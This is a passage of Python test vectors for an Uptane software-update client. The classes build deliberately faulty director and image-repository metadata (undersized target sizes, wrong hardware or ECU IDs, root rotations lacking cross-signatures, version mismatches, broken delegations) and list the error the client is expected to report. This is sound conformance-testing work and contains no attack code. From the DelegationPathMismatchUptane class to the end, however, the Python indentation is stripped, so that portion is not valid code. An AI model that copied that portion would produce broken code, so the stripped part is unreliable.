        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'targets': __targets,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class ImageRepoTargetOversizedUptane(Uptane):
    '''The image repo's metadata states that a target is smaller than it actually is.
    The target metadata in image and director do not match.
    '''
    class ImageStep(Step):
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        # Fault: the 'oversized' alteration makes the image repo describe the
        # default target with a smaller size than its actual content.
        def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
            return [Target(name=DEFAULT_TARGET_NAME,
                           content=DEFAULT_TARGET_CONTENT,
                           hardware_id=hardware_id,
                           ecu_identifier=ecu_identifier,
                           alteration='oversized')]
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'targets': __targets,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Expected per-target error reported by the client.
        TARGET_ERRORS = {
            DEFAULT_TARGET_NAME: 'TargetMismatch',
        }
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class TargetOversizedUptane(Uptane):
    '''Both the director's and image repo's metadata states that a target is smaller than it
    actually is.
    '''
    class ImageStep(Step):
        # Expected per-target error reported by the client for the image repo.
        TARGET_ERRORS = {
            DEFAULT_TARGET_NAME: 'TargetHashMismatch',
        }
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        # Fault: 'oversized' alteration applied on the image repo side.
        def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
            return [Target(name=DEFAULT_TARGET_NAME,
                           content=DEFAULT_TARGET_CONTENT,
                           hardware_id=hardware_id,
                           ecu_identifier=ecu_identifier,
                           alteration='oversized')]
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'targets': __targets,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Expected per-target error reported by the client for the director.
        TARGET_ERRORS = {
            DEFAULT_TARGET_NAME: 'OversizedTarget',
        }
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        # Fault: 'oversized' alteration applied on the director side too.
        def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
            return [Target(name=DEFAULT_TARGET_NAME,
                           content=DEFAULT_TARGET_CONTENT,
                           hardware_id=hardware_id,
                           ecu_identifier=ecu_identifier,
                           alteration='oversized')]
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'targets': __targets,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class DirectorRootRotationUptane(Uptane):
    '''Director step 0 has root v1, step 1 has root v2, it is correctly cross signed'''
    class ImageStep(Step):
        # Healthy image repo, identical in both steps.
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep1(Step):
        # Step 0: root v1 held by key idx 4.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    class DirectorStep2(Step):
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'version': 2,
            # Step 1: root v2 rotates to key idx 6, cross-signed by both the
            # old root key (4) and the new one (6).
            'root_keys_idx': [6],
            'root_sign_keys_idx': [4, 6],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep1, ImageStep),
        (DirectorStep2, ImageStep),
    ]
class ImageRepoRootRotationUptane(Uptane):
    '''Image repo step 0 has root v1, step 1 has root v2, it is correctly cross signed'''
    class ImageStep1(Step):
        # Step 0: root v1 held by key idx 0.
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class ImageStep2(Step):
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'version': 2,
            # Step 1: root v2 rotates to key idx 6, cross-signed by both the
            # old root key (0) and the new one (6).
            'root_keys_idx': [6],
            'root_sign_keys_idx': [0, 6],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Healthy director, identical in both steps.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep1),
        (DirectorStep, ImageStep2),
    ]
class DirectorRootRotationNoOriginalSignatureUptane(Uptane):
    '''Director step 0 has root v1, step 1 has root v2, it is only signed by the second root
    keys
    '''
    class ImageStep(Step):
        # Healthy image repo, identical in both steps.
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep1(Step):
        # Step 0: root v1 held by key idx 4.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    class DirectorStep2(Step):
        # The client is expected to reject root v2 with this error.
        UPDATE_ERROR = 'UnmetThreshold::Root'
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'version': 2,
            'root_keys_idx': [6],
            # Fault: root v2 is signed only by the new key (6), not cross-signed
            # by the previous root key (4).
            'root_sign_keys_idx': [6],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep1, ImageStep),
        (DirectorStep2, ImageStep),
    ]
class ImageRepoRootRotationNoOriginalSignatureUptane(Uptane):
    '''Image repo step 0 has root v1, step 1 has root v2, it is only signed by the second root
    keys
    '''
    class ImageStep1(Step):
        # Step 0: root v1 held by key idx 0.
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class ImageStep2(Step):
        # The client is expected to reject root v2 with this error.
        UPDATE_ERROR = 'UnmetThreshold::Root'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'version': 2,
            'root_keys_idx': [6],
            # Fault: root v2 is signed only by the new key (6), not cross-signed
            # by the previous root key (0).
            'root_sign_keys_idx': [6],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Healthy director, identical in both steps.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep1),
        (DirectorStep, ImageStep2),
    ]
class DirectorRootRotationNoNewSignatureUptane(Uptane):
    '''Director step 0 has root v1, step 1 has root v2, it is only signed by the first root
    keys
    '''
    class ImageStep(Step):
        # Healthy image repo, identical in both steps.
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep1(Step):
        # Step 0: root v1 held by key idx 4.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    class DirectorStep2(Step):
        # The client is expected to reject root v2 with this error.
        UPDATE_ERROR = 'UnmetThreshold::Root'
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'version': 2,
            'root_keys_idx': [6],
            # Fault: root v2 is signed only by the old key (4), never by the
            # newly declared root key (6).
            'root_sign_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep1, ImageStep),
        (DirectorStep2, ImageStep),
    ]
class ImageRepoRootRotationNoNewSignatureUptane(Uptane):
    '''Image repo step 0 has root v1, step 1 has root v2, it is only signed by the first root
    keys
    '''
    class ImageStep1(Step):
        # Step 0: root v1 held by key idx 0.
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class ImageStep2(Step):
        # The client is expected to reject root v2 with this error.
        UPDATE_ERROR = 'UnmetThreshold::Root'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'version': 2,
            'root_keys_idx': [6],
            # Fault: root v2 is signed only by the old key (0), never by the
            # newly declared root key (6).
            'root_sign_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Healthy director, identical in both steps.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep1),
        (DirectorStep, ImageStep2),
    ]
class DirectorBadHwIdUptane(Uptane):
    '''The director targets metadata has a bad hardware ID'''
    class ImageStep(Step):
        # Healthy image repo: keys 0-3 cover root/targets/snapshot/timestamp.
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Expected per-target error reported by the client.
        TARGET_ERRORS = {
            DEFAULT_TARGET_NAME: 'BadHardwareId',
        }
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        # Fault: the 'bad-hw-id' alteration gives the default target a hardware
        # ID that does not match the client's.
        def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
            return [Target(name=DEFAULT_TARGET_NAME,
                           content=DEFAULT_TARGET_CONTENT,
                           hardware_id=hardware_id,
                           ecu_identifier=ecu_identifier,
                           alteration='bad-hw-id')]
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'targets': __targets,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class ImageRepoBadHwIdUptane(Uptane):
    '''The image repo targets metadata has a bad hardware ID'''
    class ImageStep(Step):
        # Expected per-target error reported by the client: the image repo and
        # director target descriptions no longer match.
        TARGET_ERRORS = {
            DEFAULT_TARGET_NAME: 'TargetMismatch',
        }
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        # Fault: the 'bad-hw-id' alteration applied on the image repo side.
        def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
            return [Target(name=DEFAULT_TARGET_NAME,
                           content=DEFAULT_TARGET_CONTENT,
                           hardware_id=hardware_id,
                           ecu_identifier=ecu_identifier,
                           alteration='bad-hw-id')]
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'targets': __targets,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Healthy director: root key idx 4, targets key idx 5.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class BadHwIdUptane(Uptane):
    '''Both targets metadata have a bad hardware ID'''
    class ImageStep(Step):
        # Expected per-target error reported by the client.
        TARGET_ERRORS = {
            DEFAULT_TARGET_NAME: 'BadHardwareId',
        }
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        # Fault: 'bad-hw-id' alteration applied on the image repo side.
        def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
            return [Target(name=DEFAULT_TARGET_NAME,
                           content=DEFAULT_TARGET_CONTENT,
                           hardware_id=hardware_id,
                           ecu_identifier=ecu_identifier,
                           alteration='bad-hw-id')]
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'targets': __targets,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Expected per-target error reported by the client.
        TARGET_ERRORS = {
            DEFAULT_TARGET_NAME: 'BadHardwareId',
        }
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        # Fault: 'bad-hw-id' alteration applied on the director side too.
        def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
            return [Target(name=DEFAULT_TARGET_NAME,
                           content=DEFAULT_TARGET_CONTENT,
                           hardware_id=hardware_id,
                           ecu_identifier=ecu_identifier,
                           alteration='bad-hw-id')]
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'targets': __targets,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class DirectorBadEcuIdUptane(Uptane):
    '''The director targets metadata has a bad ECU ID'''
    class ImageStep(Step):
        # Healthy image repo: keys 0-3 cover root/targets/snapshot/timestamp.
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Expected per-target error reported by the client.
        TARGET_ERRORS = {
            DEFAULT_TARGET_NAME: 'BadEcuId',
        }
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        # Fault: the 'bad-ecu-id' alteration gives the default target an ECU
        # identifier that does not match the client's.
        def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
            return [Target(name=DEFAULT_TARGET_NAME,
                           content=DEFAULT_TARGET_CONTENT,
                           hardware_id=hardware_id,
                           ecu_identifier=ecu_identifier,
                           alteration='bad-ecu-id')]
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'targets': __targets,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class ImageRepoSnapshotTargetsVersionMismatchUptane(Uptane):
    '''The image repo snapshot metadata expects a newer version of the targets metadata'''
    class ImageStep(Step):
        # The client is expected to reject the update with this error.
        UPDATE_ERROR = 'VersionMismatch::targets'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            # Fault: snapshot claims targets v2 while the served targets is v1.
            'targets_version': 2,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Healthy director: root key idx 4, targets key idx 5.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class DelegationSimpleUptane(Uptane):
    '''The most basic delegation happy case where targets points at one delegation'''
    class ImageStep(Step):
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        # Key idx 6 signs the delegated targets role.
        DELEGATION_KEYS_IDX = [6]
        DELEGATIONS = {
            DEFAULT_DELEGATION_NAME: {
                'targets_keys_idx': DELEGATION_KEYS_IDX,
            },
        }
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
            # Empty top-level targets so the target is found via the delegation.
            # NOTE(review): lambda parameter order (ecu_id, hw_id) is reversed
            # vs the __targets helpers elsewhere; harmless only because both
            # arguments are ignored — confirm the framework calls positionally.
            'targets': lambda ecu_id, hw_id: [],
            'delegations_keys_idx': DELEGATION_KEYS_IDX,
            'delegations': Step.default_delegations,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Healthy director: root key idx 4, targets key idx 5.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class DelegationRedundantUptane(Uptane):
    '''A target is listed in both the top-level targets and a delegation'''
    class ImageStep(Step):
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        DELEGATION_KEYS_IDX = [6]
        DELEGATIONS = {
            DEFAULT_DELEGATION_NAME: {
                'targets_keys_idx': DELEGATION_KEYS_IDX,
                # Leave the delegation unsigned to create an obvious error so
                # that if the delegation were verified, it would fail. However,
                # it shouldn't even be downloaded, since the target should be
                # found in the top-level Targets.
                'targets_sign_keys_idx': [],
            },
        }
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
            # Leave the default Target in the Targets metadata.
            'delegations_keys_idx': DELEGATION_KEYS_IDX,
            'delegations': Step.default_delegations,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Healthy director: root key idx 4, targets key idx 5.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class DelegationPathMismatchUptane(Uptane):
'''The target name does not match the delegated role's path'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
def __delegations(delegations_keys_idx: list = None, **kwargs) -> list:
return [
Delegation(
keys_idx=delegations_keys_idx,
role=Role(
keys_idx=delegations_keys_idx,
name=DEFAULT_DELEGATION_NAME,
paths=['does-not-match'],
terminating=False,
threshold=1,
**kwargs
),
**kwargs
),
]
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': __delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'TargetMismatch',
}
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationKeyMissingUptane(Uptane):
'''The top-level targets metadata is missing a key ID for a delegated role'''
class ImageStep(Step):
UPDATE_ERROR = 'BadKeyId'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
def __delegations(delegations_keys_idx: list = None, **kwargs) -> list:
return [
Delegation(
# Note that keys_idx is empty!
role=Role(
keys_idx=delegations_keys_idx,
name=DEFAULT_DELEGATION_NAME,
